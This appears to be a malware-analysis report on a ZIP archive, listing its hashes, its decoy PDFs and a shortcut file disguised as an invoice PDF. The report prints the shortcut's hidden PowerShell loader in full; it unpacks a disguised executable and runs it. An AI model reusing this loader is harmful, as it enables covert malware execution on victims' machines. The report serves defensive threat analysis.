36f7d8ec9b6a99bc47619de331ae7c00
ZIP Archive | MD5: 36f7d8ec9b6a99bc47619de331ae7c00 | Size: 2.99 MB | application/zip
|
Hash | Hash Value |
|---|---|
| MD5 | 36f7d8ec9b6a99bc47619de331ae7c00
|
| Sha1 | 48afca504eee4de76215e837ca54bd02711f7167
|
| Sha256 | 73caf2c4018f9a3fe595b2544806f416739225dc18426d2e2ae80fdf8ddd59ca
|
| Sha384 | f1148ae37df89ab15567feab36abc93a1b295f7cf4a541e6fa11e5bd36504e346a6b244465b48ba705f80071b96eeb2e
|
| Sha512 | e93faf02b72797d6c0dabc720f32a42812906e78bed6a5adb23153e4457fb05936b1e09c7363cee58af4057b6d8308577a43d8e88c0a1942c2a85cc5cfd0250c
|
| SSDeep | 49152:j8e0K368m6IEsvF1I2z2mNrGgrz/Loqab+q0O0zqF7CKA8CWi+wCerXOXx87id:30KNm6IEkLlz5GgXcqawkzCW73ekx7
|
| TLSH | 68D5334C46295F11F2B4692B664BA43D4BCCCDDA2E68B0FF36E9C788D0671F622D4B44
|
|
Name0 | Value |
|---|---|
| Appendix_A.pdf | 1.4 |
| Contract_Agreement.pdf | 1.4 |
| Terms_of_Service.pdf | 1.4 |
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -w h -nop -c "$n='scan_0291.pdf';$e=$env:TEMP+'\~d.exe';$f=$pwd.Path+'\docs\'+$n;if(Test-Path $f){cp $f $e -Force;saps $e}else{Add-Type -A System.IO.Compression.FileSystem;gci $env:TEMP,$env:USERPROFILE\Downloads,$env:USERPROFILE\Desktop -fi *.zip -ea 0|sort LastWriteTime -d|%{try{$z=[IO.Compression.ZipFile]::OpenRead($_.FullName);$x=$z.Entries|?{$_.Name-eq$n}|select -f 1;if($x){$s=$x.Open();$o=[IO.File]::Create($e);$s.CopyTo($o);$o.Close();$s.Close();$z.Dispose();saps $e;return}$z.Dispose()}catch{}}}" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -w h -nop -c "$n='scan_0291.pdf';$e=$env:TEMP+'\~d.exe';$f=$pwd.Path+'\docs\'+$n;if(Test-Path $f){cp $f $e -Force;saps $e}else{Add-Type -A System.IO.Compression.FileSystem;gci $env:TEMP,$env:USERPROFILE\Downloads,$env:USERPROFILE\Desktop -fi *.zip -ea 0|sort LastWriteTime -d|%{try{$z=[IO.Compression.ZipFile]::OpenRead($_.FullName);$x=$z.Entries|?{$_.Name-eq$n}|select -f 1;if($x){$s=$x.Open();$o=[IO.File]::Create($e);$s.CopyTo($o);$o.Close();$s.Close();$z.Dispose();saps $e;return}$z.Dispose()}catch{}}}" Malicious |
36f7d8ec9b6a99bc47619de331ae7c00 > Invoice_0291.pdf.lnk |